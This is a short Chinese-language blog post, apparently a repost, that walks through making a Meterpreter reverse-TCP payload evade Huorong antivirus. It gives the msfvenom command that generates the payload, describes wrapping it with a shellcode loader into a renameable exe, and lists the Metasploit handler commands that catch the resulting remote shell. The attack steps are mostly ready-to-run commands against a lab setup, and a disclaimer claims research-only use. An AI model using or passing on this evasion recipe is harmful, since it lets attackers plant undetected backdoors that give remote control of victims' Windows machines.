题记
今天脑子里面蹦出来个想法,免杀木马然后cs上线,本来想让cs与msf联动的,但是出了点小问题,还是先研究免杀火绒吧。
环境
Kali:192.168.0.119 win10:192.168.0.200
工具地址:https://github.com/knownsec/shellcodeloader
步骤
1、在kali生成3.bin木马。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.119 lport=4444 -f raw -o 3.bin
2、把木马移到工具上做免杀。
生成loder.exe软件,可随意改名,运行就能上线。
3、kali开启监听。
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.0.119
exploit
然后运行exe
上线
4、火绒检测
软件运行后检测。
作者:@11阳光本文为作者原创,转载请注明出处:https://www.cnblogs.com/sunny11/p/14105624.html
原文始发于微信公众号(LemonSec):Shellcodeloader免杀过火绒
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论